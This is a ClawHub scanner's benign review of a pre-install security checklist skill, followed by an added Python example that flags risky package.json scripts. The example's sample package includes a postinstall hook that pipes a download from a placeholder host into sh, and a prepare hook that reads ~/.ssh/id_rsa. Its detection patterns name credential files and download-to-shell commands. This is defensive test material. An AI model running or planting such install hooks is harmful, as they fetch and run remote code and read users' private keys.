Skill v1.0.0
ClawScan security
Skill Scanner · ClawHub's context-aware review of the artifact, metadata, and declared behavior.
Scanner verdict
Benign · Mar 16, 2026, 7:55 PM
- Verdict
- Benign
- Confidence
- high
- Model
- gpt-5-mini
- Summary
- The skill is an instruction-only checklist for performing security checks before installing packages; its requirements and instructions are consistent with its stated purpose and it does not request extra privileges or install code.
- Guidance
- This skill is a safe, instruction-only checklist you can use before installing packages. Before you rely on it: ensure the environment where checks run has npm/git if you want the automated commands to work; review any commands the agent would execute (it may run `npm info`, `npm audit`, or inspect package.json); treat the checklist as guidance — it doesn't auto-block installs; and continue to require explicit user approval before running or installing anything flagged as suspicious.
Review Dimensions
- Purpose & Capability
- ok: Name and description match the SKILL.md content: it is a pre-install security checklist for skills/packages. There are no unrelated environment variables, binaries, or installs requested that would be disproportionate to the stated purpose.
- Instruction Scope
- note: The runtime instructions are advisory (inspect package.json, run `npm info`, `npm audit`, check repos, look for downloads/lifecycle scripts, etc.). This is appropriate for a security checklist. One minor mismatch: the skill expects tools like `npm` and `git` to be available but the metadata does not declare required binaries; that is reasonable given it's instruction-only but worth noting so an operator knows these checks rely on external CLI tools.
- Install Mechanism
- ok: No install spec and no code files, the lowest-risk category. The skill does not download or execute third-party code itself.
- Credentials
- ok: The skill requests no credentials, environment variables, or config paths. Its guidance to look for credential-access patterns (e.g., `.env`, `~/.ssh/`) is appropriate for its purpose rather than an attempt to access them.
- Persistence & Privilege
- ok: `always` is false and the skill is user-invocable. Model invocation is allowed (the default), but that is appropriate for a helper skill and not excessive given the skill has no install or credential requests.
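The offline part of the checks that the Guidance and Instruction Scope entries describe (inspect package.json for lifecycle scripts, for downloads piped into an interpreter, and for credential-path access), as an added Python example. It is not part of the skill or of ClawHub's scanner. It runs against a constructed package.json embedded inline, so it needs no network; the `npm info` and `npm audit` steps do need network and the npm CLI and are left to the operator. The function names, the pattern list, the lifecycle-hook set and the sample package are assumptions made for illustration, and the result is advisory only, matching the skill's own "don't auto-block, ask the user" stance.

```python
import json
import re

# Constructed package.json for this example (hypothetical package, not a real one).
SAMPLE_PACKAGE_JSON = """
{
  "name": "example-helper",
  "version": "1.2.3",
  "scripts": {
    "test": "node test.js",
    "postinstall": "curl -s https://example.invalid/setup.sh | sh",
    "prepare": "node -e \\"require('fs').readFileSync(process.env.HOME + '/.ssh/id_rsa')\\""
  },
  "dependencies": {"left-pad": "^1.3.0"}
}
"""

# Scripts npm runs without the user typing them: preinstall/install/postinstall on any
# install of the package, prepare for local installs and git dependencies.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
LIFECYCLE_REASON = "lifecycle hook runs automatically on install"

# Assumed heuristics for the checklist items; tune for your environment.
SUSPICIOUS_PATTERNS = {
    "download piped to an interpreter": re.compile(
        r"\b(curl|wget)\b[^|&;]*\|\s*(sh|bash|zsh|node|python3?)\b"),
    # Lookbehind keeps `process.env` from matching as a `.env` file reference.
    "credential path reference": re.compile(
        r"((?<![\w.])\.env\b|~/\.ssh|/\.ssh/|\.npmrc|\.aws/credentials|\.git-credentials)"),
    "decoded payload": re.compile(
        r"(base64\s+(-d|--decode)|Buffer\.from\([^)]*,\s*['\"]base64['\"])"),
}


def check_package_json(text):
    """Return (script_name, reason, command) findings for every scripts entry."""
    pkg = json.loads(text)
    findings = []
    for name, cmd in pkg.get("scripts", {}).items():
        if name in LIFECYCLE_HOOKS:
            findings.append((name, LIFECYCLE_REASON, cmd))
        for reason, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(cmd):
                findings.append((name, reason, cmd))
    return findings


def recommendation(findings):
    """Advisory only: say what to show the user, never install or block on its own."""
    if any(reason != LIFECYCLE_REASON for _, reason, _ in findings):
        return "stop and ask the user before installing"
    if findings:
        return "show the lifecycle scripts to the user and ask for approval"
    return "no checklist findings; proceed with normal review"


if __name__ == "__main__":
    results = check_package_json(SAMPLE_PACKAGE_JSON)
    for name, reason, cmd in results:
        print(f"[{reason}] scripts.{name}: {cmd}")
    print(recommendation(results))
```

The sample deliberately contains a plain `test` script (no finding), a `postinstall` that pipes a download into `sh`, and a `prepare` that reads `~/.ssh/id_rsa`; the first is reported only because npm would run it unprompted, the second for both reasons. A real pre-install pass would run this on the extracted tarball's package.json (what `npm pack` produces), since the repository's copy can differ from what the registry serves.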
